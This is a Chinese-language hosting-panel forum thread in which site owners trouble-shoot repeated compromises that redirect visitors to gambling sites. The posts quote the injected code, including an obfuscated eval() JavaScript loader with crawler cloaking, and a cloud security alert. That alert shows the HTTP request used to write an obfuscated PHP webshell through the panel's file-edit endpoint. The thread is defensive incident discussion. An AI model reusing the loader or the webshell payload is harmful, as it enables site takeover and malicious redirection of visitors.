[求助] 最近網(wǎng)站一直被掛馬， 會(huì)不會(huì)是WDCP環(huán)境出什么安全問(wèn)題了？

doufenger

最近網(wǎng)站一直被掛馬，從百度搜進(jìn)來(lái)的都會(huì)跳轉(zhuǎn)到一個(gè)博彩網(wǎng)頁(yè)，會(huì)不會(huì)是WDCP環(huán)境出什么安全問(wèn)題了？
我在A服務(wù)器被掛后換到B服務(wù)器（隱藏好IP了的）還是被跟上掛馬。服務(wù)器里只有一個(gè)Discuz! X3.4，其他都是靜態(tài)頁(yè)了。
被掛的代碼大概是這樣的

1. <meta name="keywords" content="澳門威尼斯在線平臺(tái),威尼斯網(wǎng)上娛樂(lè)平臺(tái),威尼斯平臺(tái)官網(wǎng),威尼斯游戲平臺(tái),威尼斯 "/>
   
2. <meta name="description" content="【wnsr484.com】威尼斯人官方網(wǎng)可以讓國(guó)內(nèi)的很多游戲玩家都開始喜好上這種娛樂(lè)游戲體驗(yàn)方式。這是人們擁有完美業(yè)余生活的有效途徑。這對(duì)改善生活質(zhì)量的作用非常的重要。"/>
   
3. <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="XX"}</script>
   
4. <script type="text/javascript">
   
5. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('o["\\e\\c\\1\\n\\f\\8\\m\\0"]["\\7\\3\\9\\0\\8"](\'\\g\\2\\1\\3\\9\\4\\0 \\0\\k\\4\\8\\d\\6\\0\\8\\l\\0\\5\\h\\a\\j\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\s\\0\\0\\4\\2\\t\\5\\5\\7\\7\\7\\b\\u\\1\\e\\a\\2\\r\\b\\1\\c\\f\\5\\j\\q\\p\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\');',31,31,'x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x76|x79|x78|x6e|x75|window|x31|x36|x38|x68|x3a|x62'.split('|'),0,{}))</script>

復(fù)制代碼

lyk082401

1. 104         admin         qq1*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
   
2. 103         admin         110*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
   
3. 102         admin         112*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
   
4. 101         admin         147*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
   
5. 100         admin         753*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
   
6. 99         admin         584*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
   
7. 98         admin         asd*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
   
8. 97         admin         1A2*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
   
9. 96         admin         159*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
   
10. 95         admin         wan*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
    
11. 94         admin         zxc*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
    
12. 93         admin         cao*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
    
13. 92         admin         nih*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
    
14. 91         admin         s12*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
    
15. 90         admin         584*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
    
16. 89         admin         12q*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
    
17. 88         admin         111*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
    
18. 87         admin         123*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
    
19. 86         admin         a12*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
    
20. 
    
21.     只顯示最近30條記錄

復(fù)制代碼

現(xiàn)在一安裝好模板就會(huì)有自動(dòng)程序破解登錄密碼
你可以去系統(tǒng)設(shè)置 登錄日志 看看有沒(méi)有

lyk082401

我記得幾個(gè)月前安裝的沒(méi)有這種情況。

lyk082401

建議去系統(tǒng)設(shè)置里面開啟三次登錄限制鎖定半小時(shí)

lediy

我的也是，多站點(diǎn)都被掛馬，懷疑服務(wù)器問(wèn)題

初七丶

和樓主一毛一樣的問(wèn)題，同求

akme8

我之前也遇到了這個(gè)問(wèn)題，我最近修補(bǔ)了網(wǎng)站的補(bǔ)丁，改了后臺(tái)地址，刪掉一些不常用的管理員賬號(hào)，在ftp上刪掉那些不屬于你的文件，還有改了ftp端口號(hào)，那些賬號(hào)密碼能改的都改掉，這一周來(lái)暫時(shí)都沒(méi)有類似的情況出現(xiàn)，希望對(duì)你有幫助。

steven001

XXXX:8080/sys/filee?act=edit&t=f&p=/www/web/XXXXXX/public_html/upload/201612/1482310143.php

我也是經(jīng)常被掛馬
通過(guò)這個(gè)地址掛上來(lái)的。這個(gè)是wdcp的文件吧

admin

登錄了后臺(tái)掛馬？
有登錄后臺(tái)的權(quán)限，哪還需要掛，直接上傳就可以，要多少有多少？

如果沒(méi)登錄，用這個(gè)地址，能掛上來(lái)？

steven001

回復(fù) 9# admin


肯定是沒(méi)有登陸掛馬。通過(guò)這個(gè)地址掛的，是阿里的 態(tài)勢(shì)感知 提示的。并且是能夠通過(guò)這個(gè)寫入文件，以下是相關(guān)的信息。請(qǐng)盡快測(cè)試。謝謝！掛了好多馬，并且跟樓主一樣，在主頁(yè)寫入了博彩的相關(guān)信息，并進(jìn)行了加密。javascript進(jìn)行解密

疑似攻擊者IP
222.247.108.16
入侵點(diǎn)URL

XXXXXX:8080/sys/filee?act=edit&t=f&p=/www/web/XXXXXXXX/public_html/upload/201612/1482310143.php
Http Payload

------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="fn"

/www/web/XXXXXXX/public_html/upload/201612/1482310143.php
------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="furl"

/sys/file?p=%2fwww%2fweb%2fwww_XXXXX_com%2fpublic_html%2fupload/201612&act=list&t=d
------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="contents"

<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enc
Http user_agent

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
被寫入的可疑文件路徑

/www/web/XXXXXXpublic_html/upload/201612/1482310143.php
事件說(shuō)明

云盾檢測(cè)到有疑似黑客在通過(guò)WEB漏洞或者WEBSHELL向服務(wù)器寫入WEBSHELL文件或可疑的二進(jìn)制文件，請(qǐng)及時(shí)關(guān)注。
解決方案

請(qǐng)及時(shí)排查告警中的URL對(duì)應(yīng)的磁盤文件是否存在漏洞，或者是否是WEBSHELL，并及時(shí)修復(fù)WEB漏洞及刪除已存在的WEBSHELL文件。如果該URL接口是您網(wǎng)站正常的文件上傳接口，請(qǐng)?jiān)诳刂婆_(tái)點(diǎn)擊標(biāo)記為誤報(bào)或忽略按鈕。

steven001

目前我做了一個(gè)服務(wù)器策略，臨時(shí)解決。所有目錄不允許寫入，upload目錄允許寫入但是不允許執(zhí)行

admin

沒(méi)登錄的話，這個(gè)是不可能寫得了文件的
你可以復(fù)制地址或路徑試試看

steven001

回復(fù) 12# admin

你好，管理員，這是阿里態(tài)勢(shì)給出的提示，肯定是沒(méi)有登陸的。密碼我修改過(guò)，直接寫入的文件。

steven001

linux系統(tǒng)也沒(méi)有新增用戶，系統(tǒng)漏洞也清理了。

admin

回復(fù) 13# steven001

密碼我修改過(guò)，直接寫入的文件。
這個(gè)是什么意思？


阿里態(tài)勢(shì)，這個(gè)也不一定準(zhǔn)確吧？要看這個(gè)是否成功訪問(wèn)的狀態(tài)
阿里給的警報(bào)，有時(shí)不太可信，在V2版本里，阿里把wdcp里的一個(gè)文件，只要這個(gè)文件存在，就危險(xiǎn)，哪怕這個(gè)文件是空文件